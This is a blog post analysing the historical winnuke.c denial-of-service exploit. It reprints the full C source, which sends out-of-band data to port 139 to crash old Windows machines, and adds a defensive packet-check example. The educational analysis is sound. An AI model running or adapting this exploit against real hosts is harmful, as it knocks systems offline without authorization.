Irregular Expressions

Jun 30 2010   12:05AM GMT

winnuke.c

Dan O'Connor

Ok, here is the code that was at the link I posted previously (it is posted at the bottom of this).

I am pretty sure this is the right code; line 1 has the author _eci. Wikipedia has an article on it and it lists the same person as the poster of the code.

I am still not an expert in C, but I can read the code and point out things of interest as we go and see if I can explain them a bit.

Lines 5-11 are includes that pull in the code the program needs. The ones of note are lines 8 and 10, netinet and socket.

Line 13 sets the destination port, 139 in this case.

Lines 15-18 declare the variables and structures.

Line 21 is the start of a function called open_sock that makes the outbound connection. (If you are really interested in creating sockets, there are great examples to be found on Google.)

On line 59 you can see the call to that function with its arguments: open_sock(<the name of the socket>, <the target>, <the destination port>)

Line 62 is the attack: send(<the name of the socket>, <the message to send>, <the length of the message>, <additional flags>). The payload is “Bye”, but the message is irrelevant. The important part is the additional flags argument, MSG_OOB. MSG_OOB marks the data as out of band, which is signalled in the TCP header, and that is exactly what causes the system to blue screen.

Ta Da!
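Seen from the defending side, as an added example that is not part of the original post or of winnuke.c: a check that flags an IPv4/TCP segment addressed to port 139 with the URG bit set, which is how data sent with MSG_OOB appears on the wire. The function names and the sample packet are constructed for illustration.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>

#define NETBIOS_PORT 139   /* same value as dport in the listing */
#define TCP_URG      0x20  /* URG bit in the TCP flags byte */

/* 1: IPv4/TCP segment to port 139 with URG set; 0: anything else;
 * -1: buffer too short or not IPv4. Checksums are not validated. */
int is_oob_to_netbios(const uint8_t *buf, size_t len)
{
    if (len < 20 || (buf[0] >> 4) != 4)
        return -1;
    size_t ihl = (size_t)(buf[0] & 0x0f) * 4;   /* IP header length */
    if (ihl < 20 || len < ihl)
        return -1;
    if (buf[9] != 6)                            /* not TCP */
        return 0;
    if (((buf[6] & 0x1f) << 8 | buf[7]) != 0)   /* later fragment: no TCP header */
        return 0;
    if (len < ihl + 20)                         /* truncated TCP header */
        return -1;
    const uint8_t *tcp = buf + ihl;
    unsigned dst = (unsigned)tcp[2] << 8 | tcp[3];
    return dst == NETBIOS_PORT && (tcp[13] & TCP_URG) != 0;
}

/* Constructed sample: bare IPv4+TCP headers, 192.0.2.1 -> 192.0.2.2. */
int check_sample(uint16_t dst_port, uint8_t tcp_flags)
{
    uint8_t p[40] = {0x45,0,0,40, 0,1,0,0, 64,6,0,0, 192,0,2,1, 192,0,2,2};
    p[20] = 0x04;                      /* source port 1024 */
    p[22] = (uint8_t)(dst_port >> 8);
    p[23] = (uint8_t)(dst_port & 0xff);
    p[32] = 0x50;                      /* TCP data offset: 5 words */
    p[33] = tcp_flags;
    return is_oob_to_netbios(p, sizeof p);
}

int main(void)
{
    printf("PSH|ACK|URG to 139: %d\n", check_sample(139, 0x38));
    printf("PSH|ACK     to 139: %d\n", check_sample(139, 0x18));
    printf("PSH|ACK|URG to 80:  %d\n", check_sample(80, 0x38));
    return 0;
}
```

Only the first case is flagged; ordinary traffic to port 139 without URG, and urgent data to other ports, are not.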

( it was here if you did not get it –> neil.franklin.ch/Info_Texts/winnuke.c )

1 /* winnuke.c - (05/07/97)  By _eci  */
2 /* Tested on Linux 2.0.30, SunOS 5.5.1, and BSDI 2.1 */
3
4
5 #include <stdio.h>
6 #include <string.h>
7 #include <netdb.h>
8 #include <netinet/in.h>
9 #include <sys/types.h>
10 #include <sys/socket.h>
11 #include <unistd.h>
12
13 #define dport 139  /* Attack port: 139 is what we want */
14
15 int x, s;
16 char *str = "Bye";  /* Makes no diff */
17 struct sockaddr_in addr, spoofedaddr;
18 struct hostent *host;
19
20
21 int open_sock(int sock, char *server, int port) {
22     struct sockaddr_in blah;
23     struct hostent *he;
24     bzero((char *)&blah,sizeof(blah));
25     blah.sin_family=AF_INET;
26     blah.sin_addr.s_addr=inet_addr(server);
27     blah.sin_port=htons(port);
28
29    if ((he = gethostbyname(server)) != NULL) {
30       bcopy(he->h_addr, (char *)&blah.sin_addr, he->h_length);
31    }
32    else {
33         if ((blah.sin_addr.s_addr = inet_addr(server)) < 0) {
34           perror("gethostbyname()");
35           return(-3);
36         }
37    }
38
39        if (connect(sock,(struct sockaddr *)&blah,16)==-1) {
40             perror("connect()");
41             close(sock);
42             return(-4);
43        }
44        printf("Connected to [%s:%d].\n",server,port);
45        return;
46 }

47 void main(int argc, char *argv[]) {
48
49     if (argc != 2) {
50       printf("Usage: %s <target>\n",argv[0]);
51       exit(0);
52     }
53
54     if ((s = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) == -1) {
55        perror("socket()");
56        exit(-1);
57     }
58
59     open_sock(s,argv[1],dport);
60
61     printf("Sending crash... ");
62       send(s,str,strlen(str),MSG_OOB);
63       usleep(100000);
64     printf("Done!\n");
65     close(s);
66 }
